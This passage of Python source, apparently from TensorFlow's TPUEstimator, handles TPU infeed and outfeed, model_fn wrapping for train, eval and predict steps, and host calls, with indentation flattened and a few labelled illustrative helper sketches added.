self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have the same structure (single tensor vs.
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is constructed, the body function, which invokes the
# `enqueue_fn` passed in, is called to build the graph. So, the input_fn
# structure is recorded at that point.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
      # This branch handles two scenarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
            # NOTE(xiejw): We dispatch here based on the return type of the
            # user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
    # infeed_queue is used to generate dequeue ops. The only thing it uses for
    # dequeue is dtypes and shapes. So, any one can be used. Here, grab the
    # first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
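# Hedged illustration (not part of the original module): a minimal `tf.data`
# based input_fn of the kind the QueueRunner warning above recommends. The
# feature name 'x', the tensor shapes, and the local TensorFlow import are
# illustrative assumptions only.
def _example_tf_data_input_fn(params):
  """Sketch of an input_fn that returns a batched, repeated Dataset."""
  import tensorflow.compat.v1 as tf  # Local import keeps the sketch self-contained.
  batch_size = params['batch_size']  # Per-shard size injected by TPUEstimator.
  dataset = tf.data.Dataset.from_tensor_slices(
      {'x': tf.zeros([1024, 8], dtype=tf.float32)})
  # drop_remainder=True keeps batch shapes static, which TPU infeed requires.
  return dataset.repeat().batch(batch_size, drop_remainder=True)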
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
    computation: A Python function that takes `computation_inputs` and builds
      the computation graph. If `computation` returns m outputs, this function
      will return a list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
  # Not using the batching function; use TPUPartitionedCall across all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
  # Use the batching function and TPUPartitionedCall across all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
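# Hedged usage sketch for `call_computation` above (not part of the original
# module): the computation body and the `features` dict layout are illustrative
# assumptions. It shows how a batched TPU inference call is assembled.
def _example_call_computation(features):
  """Sketch: run a trivial reduction on TPU with batching enabled."""
  def computation(inputs):
    # `inputs` has the same structure as `features`, recomposed after batching.
    return [math_ops.reduce_sum(inputs['x'], axis=-1)]
  return call_computation(
      features,
      computation,
      batch_config=BatchConfig(
          num_batch_threads=1,
          max_batch_size=8,
          batch_timeout_micros=1000,
          allowed_batch_sizes=[8]))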
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
  This makes calling model_fn on CPU and TPU easier and more consistent, and
  performs the necessary checks and mutations required by TPU training and
  evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of train_fn, host_calls, captured scaffold_fn, and captured
      training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(ops.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat many times and then replicated to
    all TPU shards. Besides, the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
      hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
      prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
    # TODO(xiejw): Add validation for the prediction dictionary.
    # TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
    # Makes deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
          err_msg.format('training_chief_hooks') + ' If you want' +
          ' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
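# Hedged sketch (not part of the original module) of the `host_call` structure
# that _OutfeedHostCall below records: a `(fn, tensors)` pair whose tensors are
# outfed from the TPU, concatenated across replicas along axis 0, and passed to
# `fn` on the host. The step/loss arguments are illustrative assumptions.
def _example_host_call(global_step, loss):
  """Sketch: build a host_call tuple carrying step and loss to the CPU host."""
  def host_fn(gs, loss_t):
    # Runs on the host; `gs` and `loss_t` arrive with a leading replica axis.
    del gs  # Unused in this sketch.
    return array_ops.identity(loss_t)
  return (host_fn,
          [array_ops.reshape(global_step, [1]), array_ops.reshape(loss, [1])])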
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated tensors are passed to the host_fn,
    which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
    # It is assumed evaluation always happens on a single-host TPU system. So,
    # place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
          # TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
            # If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
